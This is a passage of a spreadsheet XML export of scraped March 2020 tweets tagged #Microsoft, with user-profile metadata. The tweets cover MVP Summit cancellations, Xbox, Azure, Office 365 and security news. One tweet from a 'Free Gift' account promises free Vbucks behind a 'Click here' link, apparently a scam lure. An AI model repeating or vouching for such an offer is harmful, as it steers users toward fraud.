    <t>#EdTech #microsoft     73% of teachers report working in classrooms with student reading levels that span four or more grade levels. That's why it's so important to provide a personalized learning experience for each student. #Office365 https://t.co/Vb3QJKEKkO</t>
  </si>
  <si>
    <t>Mon Mar 02 21:56:44 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft Announces Two Brand #New Special Edition Xbox Wireless #Controllers #YerwoodCenter #updates #announced</t>
  </si>
  <si>
    <t>{'id': 798153935534039040, 'id_str': '798153935534039040', 'name': 'Yerwood', 'screen_name': 'yerwood_center', 'location': 'Stamford, CT USA', 'description': 'Community centers are public where members gather for group activities, social support,  within the greater community. #YerwoodCenter, #GivingTuesday', 'url': 'https://t.co/Xg43EVxUHb', 'entities': {'url': {'urls': [{'url': 'https://t.co/Xg43EVxUHb', 'expanded_url': 'https://podcasts.apple.com/us/podcast/alzfacts-alzheimers-disease/id1171558927?i=1000460176620', 'display_url': 'podcasts.apple.com/us/podcast/alzâ€¦', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 69, 'friends_count': 156, 'listed_count': 37, 'created_at': 'Mon Nov 14 13:21:42 +0000 2016', 'favourites_count': 47, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 72930,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'http://pbs.twimg.com/profile_images/1225776381189115904/oHualIXJ_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1225776381189115904/oHualIXJ_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/798153935534039040/1581083170',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</si>
  <si>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21:55:04 +0000 2020</t>
  </si>
  <si>
    <t>Here at Datcher Group were the #Microsoft Azure experts! We learned all the ins and outs so you dont have to. We know everything there is to know about assessing #security, remediating concerns, identifying objectives, and protecting #data. https://t.co/NXdZ1scBIt https://t.co/vEvDSTmBTX</t>
  </si>
  <si>
    <t>{'id': 1123301768094470144, 'id_str': '1123301768094470144', 'name': 'DatcherSecure', 'screen_name': 'DatcherSecure', 'location': 'Philadelphia, PA', 'description': 'Datcher Group is an information security company founded to manage the convergence of business risk and IT security.', 'url': 'https://t.co/x081ZThy8z', 'entities': {'url': {'urls': [{'url': 'https://t.co/x081ZThy8z', 'expanded_url': 'http://datchergroup.com/', 'display_url': 'datchergroup.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 479, 'friends_count': 196, 'listed_count': 0, 'created_at': 'Tue Apr 30 19:03:06 +0000 2019', 'favourites_count': 167, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 231,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'http://pbs.twimg.com/profile_images/1131289615040733184/FAGqRHkc_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1131289615040733184/FAGqRHkc_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1123301768094470144/1558555736',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</si>
  <si>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21:53:40 +0000 2020</t>
  </si>
  <si>
    <t>#Uber is moving all of its 38,000 employees to #Slack, is a big win for the work-chat app, which has been under pressure from its rival #Microsoft Teams in the work-chat app market
#EmergingTech #DigitalTransformation #messenger 
https://t.co/5aWUpPYzDI</t>
  </si>
  <si>
    <t>{'id': 99674560, 'id_str': '99674560', 'name': 'Dr. Marcell Vollmer', 'screen_name': 'mvollmer1', 'location': 'Munich, Bavaria', 'description': 'Chief Innovation Officer @Celonis. Passionate about life &amp; coffee. PhD &amp; MBA in Economics. Social Media enthusiast and curious to continuously learn &amp; grow', 'url': 'https://t.co/EsPFMBdrDN', 'entities': {'url': {'urls': [{'url': 'https://t.co/EsPFMBdrDN', 'expanded_url': 'https://www.linkedin.com/in/marcellvollmer/', 'display_url': 'linkedin.com/in/marcellvollâ€¦', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 50152, 'friends_count': 43506, 'listed_count': 585, 'created_at': 'Sun Dec 27 09:07:18 +0000 2009', 'favourites_count': 202957, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 80623,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'http://pbs.twimg.com/profile_images/735212931940552704/83zOt4k5_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/735212931940552704/83zOt4k5_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/99674560/1486476950',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</si>
  <si>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21:53:23 +0000 2020</t>
  </si>
  <si>
    <t>Top 5 Holdings of Bill Gates Foundation Trust - https://t.co/AVW6OH9iOW https://t.co/8qUJaJ9ZgC $MSFT $BRK.A $BRK.B $AAPL $WM $CAT $CNI $WMT #microsoft #apple #dowjones #trust</t>
  </si>
  <si>
    <t>{'id': 743170402843693056, 'id_str': '743170402843693056', 'name': 'James Li Guru', 'screen_name': 'JamesLiGuru', 'location': '', 'description': 'Editorial Assistant, Guru Researcher', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 238, 'friends_count': 114, 'listed_count': 7, 'created_at': 'Wed Jun 15 19:56:46 +0000 2016', 'favourites_count': 721, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 859, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/743440636578168832/gF7h0Opk_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/743440636578168832/gF7h0Opk_normal.jpg',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</si>
  <si>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21:50:03 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft Edge can now block adware and other &amp;amp; potentially unwanted apps. via @windowscentral https://t.co/No9ze2LlYn #Microsoft #Edge #Browsers #Internet #Online #Australia</t>
  </si>
  <si>
    <t>Mon Mar 02 21:48:52 +0000 2020</t>
  </si>
  <si>
    <t>Awesome to see how Microsoft is helping with #Microsoft #Office365 #MicrosoftTeams #covid19  https://t.co/rVMrBj9ti4</t>
  </si>
  <si>
    <t>{'id': 39978521, 'id_str': '39978521', 'name': 'Louis GÃ¶hl', 'screen_name': 'louisgohl', 'location': 'Groningen', 'description': 'Business Consultant bij @NORISKIT (onderdeel van de @vinceregroep) | Mobility | Cloud | Security | EUC | Father of 2 | Tweets are my own', 'url': 'https://t.co/nC41ZhMPLO', 'entities': {'url': {'urls': [{'url': 'https://t.co/nC41ZhMPLO', 'expanded_url': 'https://www.linkedin.com/in/louisgohl/detail/recent-activity/', 'display_url': 'linkedin.com/in/louisgohl/dâ€¦', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1335, 'friends_count': 2513, 'listed_count': 212, 'created_at': 'Thu May 14 11:58:59 +0000 2009', 'favourites_count': 4734, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 17295, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F8F7F3', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme9/bg.gif', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme9/bg.gif', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1082291215549251585/05B2p9Q0_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1082291215549251585/05B2p9Q0_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/39978521/1582390402', 'profile_link_color': '1B95E0', 'profile_sidebar_border_color': '000000', 'profile_sidebar_fill_color': 'EFEFEF', 'profile_text_color': '614F6E', 'profile_use_background_image': True, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Mon Mar 02 21:48:14 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft announced last week that its role-based certificates will replace existing #Microsoft Certified Solutions Associate (MCSA), Microsoft Certified Solutions Developer (MCSD), and Microsoft Certified Solutions Expert (MCSE) certificates this June.
 https://t.co/JCHpuj1Jyp</t>
  </si>
  <si>
    <t>Mon Mar 02 21:46:38 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft: 44 million user accounts have a serious security problem: https://t.co/KZB0tvl6Yq
#Cybersecurity #Business #Microsoft https://t.co/sIAOAA4WVC</t>
  </si>
  <si>
    <t>{'id': 968709591746924544, 'id_str': '968709591746924544', 'name': 'ingeniousnewsroom', 'screen_name': 'ingeniousnewsrm', 'location': 'California, USA', 'description': 'Tech news exclusively for small business owners', 'url': 'https://t.co/0hTNMJo7cF', 'entities': {'url': {'urls': [{'url': 'https://t.co/0hTNMJo7cF', 'expanded_url': 'http://ingenious.news', 'display_url': 'ingenious.news', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 28, 'friends_count': 135, 'listed_count': 1, 'created_at': 'Wed Feb 28 04:48:59 +0000 2018', 'favourites_count': 24, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1349, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/975143082994757632/GZYstrui_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/975143082994757632/GZYstrui_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/968709591746924544/1521327281',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</si>
  <si>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21:46:28 +0000 2020</t>
  </si>
  <si>
    <t>Literally Freaking Out Right Now!!! 
.
.
.
Tags:
#support #RarityGames #gaming #games #nerd #nerdlife #Gamer4life #gamerlife #sony #microsoft #nintendo #ps4 #xbox #switch #stadia #google #videogames #news... https://t.co/RP8llzam2N</t>
  </si>
  <si>
    <t>{'id': 331284609, 'id_str': '331284609', 'name': 'Rarity Games', 'screen_name': 'RarityGaming', 'location': 'Lansdowne, PA', 'description': 'Games are our Passion. Check out our YouTube Channel for all the daily news and upcoming events in the Gaming Industry at Rarity Games! Keep on Gaming!', 'url': 'https://t.co/rBdfvtTon6', 'entities': {'url': {'urls': [{'url': 'https://t.co/rBdfvtTon6', 'expanded_url': 'https://www.youtube.com/channel/UCcwhFreFeiDdydDlpz26BrA', 'display_url': 'youtube.com/channel/UCcwhFâ€¦', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 517, 'friends_count': 238, 'listed_count': 2, 'created_at': 'Thu Jul 07 23:03:20 +0000 2011', 'favourites_count': 394, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1609,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'http://pbs.twimg.com/profile_images/1150868375830257664/8ZNsJmBC_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1150868375830257664/8ZNsJmBC_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/331284609/1566775600',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</si>
  <si>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21:45:48 +0000 2020</t>
  </si>
  <si>
    <t>12% can feel lika a veeeery long time 
Cant wait to try this baby out #microsoft #xbox #xboxelite https://t.co/Trfi4GyYyV</t>
  </si>
  <si>
    <t>{'id': 1210645337708384256, 'id_str': '1210645337708384256', 'name': 'ãƒ­ãƒ¬ãƒ³ã‚¾ ãƒ•ãƒ­ãƒªã‚¹', 'screen_name': 'FlorisLorenzo', 'location': 'London, England', 'description': '', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 4, 'friends_count': 71, 'listed_count': 0, 'created_at': 'Fri Dec 27 19:36:17 +0000 2019', 'favourites_count': 26,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'http://pbs.twimg.com/profile_images/1215393009790939137/fi7LfPly_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1215393009790939137/fi7LfPly_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1210645337708384256/1577487624',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</si>
  <si>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21:44:19 +0000 2020</t>
  </si>
  <si>
    <t>#cybersecurity #infosec #microsoft     With the simplified and intelligent security management of #Microsoft365, you can feel confident knowing where you are and where you should be going to continually improve your security posture. https://t.co/MaHJdygV8X</t>
  </si>
  <si>
    <t>Mon Mar 02 21:42:57 +0000 2020</t>
  </si>
  <si>
    <t>Mon Mar 02 21:41:13 +0000 2020</t>
  </si>
  <si>
    <t>A sample of content that's to come. .
Prime example of why you shouldn't teabag in #gearsofwar5 
You should've seen the messages I got after this 
#gearsofwar #gears5 #xbox #xboxone #microsoft #gaming #streaming... https://t.co/jmY13GuUeQ</t>
  </si>
  <si>
    <t>{'id': 1234568310630469632, 'id_str': '1234568310630469632', 'name': 'immersivegamingbrand', 'screen_name': 'immersivegb', 'location': '', 'description': '', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 2, 'friends_count': 8, 'listed_count': 0, 'created_at': 'Mon Mar 02 19:56:46 +0000 2020', 'favourites_count': 17,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'http://pbs.twimg.com/profile_images/1235432595573202945/ssPHnMmj_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1235432595573202945/ssPHnMmj_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1234568310630469632/1583184224',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</si>
  <si>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21:40:35 +0000 2020</t>
  </si>
  <si>
    <t>IoT devices and security goes hand in hand. Investing in security is very crucial for every industry. The Azure sphere by Microsoft has built a layer of security and reliability in this world of IoT. 
#MK6102 #IN6062 
#Microsoft  #IoTSecurity</t>
  </si>
  <si>
    <t>{'id': 1225366769801531392, 'id_str': '1225366769801531392', 'name': 'Urmi Panchal', 'screen_name': 'Urmi_Panchal_', 'location': 'Limerick, Ireland', 'description': 'Master of Science in Business Analytics, University of Limerick                                                                \nMaster of Science in Mathematics', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 44, 'friends_count': 87, 'listed_count': 1, 'created_at': 'Thu Feb 06 10:33:10 +0000 2020', 'favourites_count': 24,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'http://pbs.twimg.com/profile_images/1234947514031366144/Q5lEohXa_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1234947514031366144/Q5lEohXa_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1225366769801531392/1583269875',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</si>
  <si>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21:35:28 +0000 2020</t>
  </si>
  <si>
    <t>#MVPSummit I cannot say I am not disappointed, however I respect the decision made by #Microsoft. See you next time #MVPBuzz Many thanks to @ClaireS_MS</t>
  </si>
  <si>
    <t>{'id': 413258049, 'id_str': '413258049', 'name': 'Terry McCann', 'screen_name': 'SQLShark', 'location': 'Exeter', 'description': 'Director of Artificial Intelligence, #Microsoft MVP, MSc in Data Science, Owner of @AdvAnalyticsUK, Voice of @DSInProduction, #DataOps #MachineLearning', 'url': 'https://t.co/sXH4dMrUwJ', 'entities': {'url': {'urls': [{'url': 'https://t.co/sXH4dMrUwJ', 'expanded_url': 'http://www.advancinganalytics.co.uk', 'display_url': 'advancinganalytics.co.uk', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1951, 'friends_count': 298, 'listed_count': 88, 'created_at': 'Tue Nov 15 17:28:33 +0000 2011', 'favourites_count': 5726, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 4183,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'http://pbs.twimg.com/profile_images/1138043870984507395/Hgrufh6t_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1138043870984507395/Hgrufh6t_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/413258049/1543952294',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</si>
  <si>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21:35:21 +0000 2020</t>
  </si>
  <si>
    <t>via #BleepingComputer Blog: "Windows 10 Y3K Bug: Won't Install After January 18, 3001:" https://t.co/MqpQhXH5DJ
.
.
.
#Microsoft #Linux #blog #virtualization #cloudcomputing #cloud #security #ransomeware</t>
  </si>
  <si>
    <t>Mon Mar 02 21:35:05 +0000 2020</t>
  </si>
  <si>
    <t>Ensuring SQL Server High Availability in the Cloud High-performance cloud file shares, disaster recovery in cloud databases, and the high availability numbers that matter in SQL Server... #software #database #data #microsoft https://t.co/KC6asuJAdq</t>
  </si>
  <si>
    <t>Mon Mar 02 21:33:24 +0000 2020</t>
  </si>
  <si>
    <t xml:space="preserve">@VICE #Apple #Microsoft is it like that you make the world a better place ? A better place for your shareholders ?
</t>
  </si>
  <si>
    <t>{'id': 718189034909147142, 'id_str': '718189034909147142', 'name': 'Razor', 'screen_name': 'Halim_Zzz', 'location': '', 'description': '', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 47, 'friends_count': 98, 'listed_count': 0, 'created_at': 'Thu Apr 07 21:29:44 +0000 2016', 'favourites_count': 10355, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 2114, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1215380280309157905/lhd5fnPm_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1215380280309157905/lhd5fnPm_normal.jpg',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</si>
  <si>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21:27:30 +0000 2020</t>
  </si>
  <si>
    <t>Get 13500 Vbucks for the Xbox One!
Click here : https://t.co/T9wZY5c7S5
#PS4 #Amazon #XboxOne #iTunes #gaming #games #Microsoft #PlayStation https://t.co/8rTtm7pbEZ</t>
  </si>
  <si>
    <t>{'id': 1198046861531254785, 'id_str': '1198046861531254785', 'name': 'Free Gift', 'screen_name': 'MiroMir28280981', 'location': 'United States ', 'description': 'United States', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 529, 'friends_count': 1616, 'listed_count': 0, 'created_at': 'Sat Nov 23 01:13:35 +0000 2019', 'favourites_count': 59, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 696, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1232808041038467072/EsSrTpLG_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1232808041038467072/EsSrTpLG_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1198046861531254785/1582759278',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</si>
  <si>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21:16:56 +0000 2020</t>
  </si>
  <si>
    <t>#DFIR investigators: Reattach your neck braces and prepare for another dose of whiplash from #Microsoft.
#Office365 MailItemsAccessed Mailbox Audit action for investigations is back... BUT ONLY for those with E5 License or Compliance Add-on subscription.
https://t.co/T8UoTAPuTP</t>
  </si>
  <si>
    <t>{'id': 2471617604, 'id_str': '2471617604', 'name': 'J P', 'screen_name': 'JPoForenso', 'location': 'Remote', 'description': "DFIR Consultant. Winders, Linux, Mac, and AWS. Livin' on the *nix command line. I've got a fever, and the only prescription is more #DFIR.", 'url': 'https://t.co/B4k5BO22My', 'entities': {'url': {'urls': [{'url': 'https://t.co/B4k5BO22My', 'expanded_url': 'https://www.ponderthebits.com', 'display_url': 'ponderthebits.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1397, 'friends_count': 213, 'listed_count': 45, 'created_at': 'Wed Apr 30 23:12:52 +0000 2014', 'favourites_count': 166, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 2282,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'http://pbs.twimg.com/profile_images/461722897422094336/G3v5ip5p_normal.jpeg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/461722897422094336/G3v5ip5p_normal.jpeg',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</si>
  <si>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21:16:30 +0000 2020</t>
  </si>
  <si>
    <t>The Blue Screen of Disappointment...
#FrownyFaceOfDoom #FrownyFace #BSODFace #bluescreen #microsoft #w10 #comic #webcomic #comics #funny https://t.co/rpKMuldQOe https://t.co/jlBN5IySzn</t>
  </si>
  <si>
    <t>{'id': 972087178003021824, 'id_str': '972087178003021824', 'name': 'Marcus Liotta (Technocrat)', 'screen_name': 'MarcusLiotta', 'location': 'Texas, USA', 'description': 'Veritas. Dark Thoughts plague my mind... #Darkfantasy #ScienceFiction #Horror.  https://t.co/Wuzk5PuW1n', 'url': 'https://t.co/Ff1IakAE5K', 'entities': {'url': {'urls': [{'url': 'https://t.co/Ff1IakAE5K', 'expanded_url': 'https://marcusliotta.com', 'display_url': 'marcusliotta.com', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/Wuzk5PuW1n', 'expanded_url': 'http://amazon.com/author/marcusliotta', 'display_url': 'amazon.com/author/marcuslâ€¦', 'indices': [80, 103]}]}}, 'protected': False, 'followers_count': 1919, 'friends_count': 2618, 'listed_count': 27, 'created_at': 'Fri Mar 09 12:30:18 +0000 2018', 'favourites_count': 3190, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 3520,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'http://pbs.twimg.com/profile_images/1161479016601346048/7gW465aD_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1161479016601346048/7gW465aD_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/972087178003021824/1564442651', 'profile_link_color': '2F4F4F',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</si>
  <si>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21:16:23 +0000 2020</t>
  </si>
  <si>
    <t>Trudging back into another week. Im already waiting for the weekend!
.
 @agonzaga46
.
#teamairassault #airassault #anvilstation #halo #haloreach #halocosplay #xbox #xbox360 #xboxonex #microsoft #xboxone #343industries #bungie #cosplay #cosplayersof... https://t.co/QajBXOmf8f https://t.co/b6z2Xvo2Ik</t>
  </si>
  <si>
    <t>Mon Mar 02 21:16:15 +0000 2020</t>
  </si>
  <si>
    <t>Envisioning Tomorrow keynote | #Microsoft Ignite 2019 https://t.co/haDMvaziXT #Azure #Cloud #Developers #MSDevIRL #MSIgnite</t>
  </si>
  <si>
    <t>Mon Mar 02 21:15:39 +0000 2020</t>
  </si>
  <si>
    <t>Envisioning Tomorrow keynote | #Microsoft Ignite 2019 https://t.co/iNtEXCtUzE #Azure #Cloud #Developers #MSDevIRL #MSIgnite</t>
  </si>
  <si>
    <t>Mon Mar 02 21:07:48 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft: 44 million user accounts have a serious security problem: https://t.co/EGdPdOEzRb
#Business #Microsoft #Cybersecurity https://t.co/RGtDAcTLHr</t>
  </si>
  <si>
    <t>{'id': 14151381, 'id_str': '14151381', 'name': 'garymetz', 'screen_name': 'garymetz', 'location': 'Tustin, CA 92780', 'description': '', 'url': 'https://t.co/CqWG82fUxB', 'entities': {'url': {'urls': [{'url': 'https://t.co/CqWG82fUxB', 'expanded_url': 'http://www.linkedin.com/in/garymetz', 'display_url': 'linkedin.com/in/garymetz', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 140, 'friends_count': 317, 'listed_count': 4, 'created_at': 'Sat Mar 15 04:48:57 +0000 2008', 'favourites_count': 529, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 1379,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'http://pbs.twimg.com/profile_images/933032706132262912/zIcsXESC_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/933032706132262912/zIcsXESC_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/14151381/1511299310',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</si>
  <si>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21:07:28 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft cancels MVP Summit due to COVID-19 coronavirus fears https://t.co/awljtbc6yJ #Microsoft</t>
  </si>
  <si>
    <t>Mon Mar 02 21:06:24 +0000 2020</t>
  </si>
  <si>
    <t>Who is still going to Seattle even though MVP Summit 2020 was converted to an online-only event? #MVPBuzz #Microsoft</t>
  </si>
  <si>
    <t>{'id': 311633940, 'id_str': '311633940', 'name': 'Radoslav Gatev', 'screen_name': 'RadoslavGatev', 'location': '', 'description': 'Microsoft #Azure #MVP | MCSE #Cloud Platform | Software Architect | Blogger @ https://t.co/Ntyrcp8FjU | Conf speaker | OSS contributor | Ukulele strummer', 'url': 'https://t.co/HFMb9yDrbn', 'entities': {'url': {'urls': [{'url': 'https://t.co/HFMb9yDrbn', 'expanded_url': 'http://www.gatevnotes.com', 'display_url': 'gatevnotes.com', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/Ntyrcp8FjU', 'expanded_url': 'http://gatevnotes.com', 'display_url': 'gatevnotes.com', 'indices': [78, 101]}]}}, 'protected': False, 'followers_count': 291, 'friends_count': 650, 'listed_count': 10, 'created_at': 'Sun Jun 05 19:48:14 +0000 2011', 'favourites_count': 318, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 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'http://pbs.twimg.com/profile_images/1047870667675357185/DlNIV9mY_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1047870667675357185/DlNIV9mY_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/311633940/1511512847', 'profile_link_color': '71213E',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</si>
  <si>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21:05:18 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft cancels MVP Summit due to COVID-19 coronavirus fears https://t.co/zPKkxAji1r #ZDNet #Microsoft</t>
  </si>
  <si>
    <t>Mon Mar 02 21:05:17 +0000 2020</t>
  </si>
  <si>
    <t>What's the most popular web browser in 2020? https://t.co/r9BGwR07Et #ZDNet #Microsoft</t>
  </si>
  <si>
    <t>Mon Mar 02 21:01:29 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft launches #entrepreneurship program to support #startups tackling societal challenges
https://t.co/u0xDr4KRQy</t>
  </si>
  <si>
    <t>{'id': 78014820, 'id_str': '78014820', 'name': 'The Rostie Group', 'screen_name': 'RostieGroup', 'location': "Toronto's Waterfront SouthCore", 'description': 'A Work Community offering Meeting &amp; Training Rooms, Offices, Team Spaces, Coworking, &amp; Virtuals with the latest in technology  416-214-1840 info@rostiegroup.com', 'url': 'http://t.co/WXA0eoXIc4', 'entities': {'url': {'urls': [{'url': 'http://t.co/WXA0eoXIc4', 'expanded_url': 'http://www.rostiegroup.com', 'display_url': 'rostiegroup.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 7208, 'friends_count': 7354, 'listed_count': 548, 'created_at': 'Mon Sep 28 13:34:10 +0000 2009', 'favourites_count': 4046, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 21255, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'CE582F', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme15/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme15/bg.png', 'profile_background_tile': True, 'profile_image_url': 'http://pbs.twimg.com/profile_images/519190300938362880/k_OuXi2u_normal.jpeg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/519190300938362880/k_OuXi2u_normal.jpeg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/78014820/1397138080', 'profile_link_color': 'CE582F',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</si>
  <si>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Mon Mar 02 21:01:01 +0000 2020</t>
  </si>
  <si>
    <t>#Educating Educators: #Microsoft's Tips for Security awareness @alcgroup @pingudownunder
@JamesMeikle
@SimonStahn
https://t.co/neKRFjRFsU via @DarkReading</t>
  </si>
  <si>
    <t>{'id': 1219560709953994752, 'id_str': '1219560709953994752', 'name': 'Threat Vector Security', 'screen_name': 'threatvectorAUS', 'location': '', 'description': 'Focus on Facts, Not Silver Bullets.', 'url': 'https://t.co/YC0FOyBCTZ', 'entities': {'url': {'urls': [{'url': 'https://t.co/YC0FOyBCTZ', 'expanded_url': 'https://www.threatvectorsecurity.com', 'display_url': 'threatvectorsecurity.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 127, 'friends_count': 385, 'listed_count': 1, 'created_at': 'Tue Jan 21 10:02:02 +0000 2020', 'favourites_count': 105, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 136, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1223883483338031105/xK7fzI77_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1223883483338031105/xK7fzI77_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1219560709953994752/1580631565',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</si>
  <si>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21:00:56 +0000 2020</t>
  </si>
  <si>
    <t>"Over 91% of #Fortune500 companies are using #MicrosoftTeams as platform of choice for employees to connect, work, #communicate &amp;amp; create securely."
Are you using #Teams?  
Learn how @CoreBTS can manage your change to Teams: https://t.co/0P2IXmgEhD
#collaborate #Microsoft #tech https://t.co/iQwnuJktdr</t>
  </si>
  <si>
    <t>Mon Mar 02 21:00:37 +0000 2020</t>
  </si>
  <si>
    <t>How to build custom reports in Microsoft Dynamics 365 Business Central 
https://t.co/He0L7WX2Ye #Microsoft 
#MSDyn365bc #PowerBI #Reports #Visualizations https://t.co/hjgDtEXHjL</t>
  </si>
  <si>
    <t>Mon Mar 02 20:58:41 +0000 2020</t>
  </si>
  <si>
    <t>Okay. The #event I was most looking forward this year is #cancelled. Understandably . Still sad . See you next year at #mvpsummit! #mvpbuzz #microsoft #seattle #coronasucks</t>
  </si>
  <si>
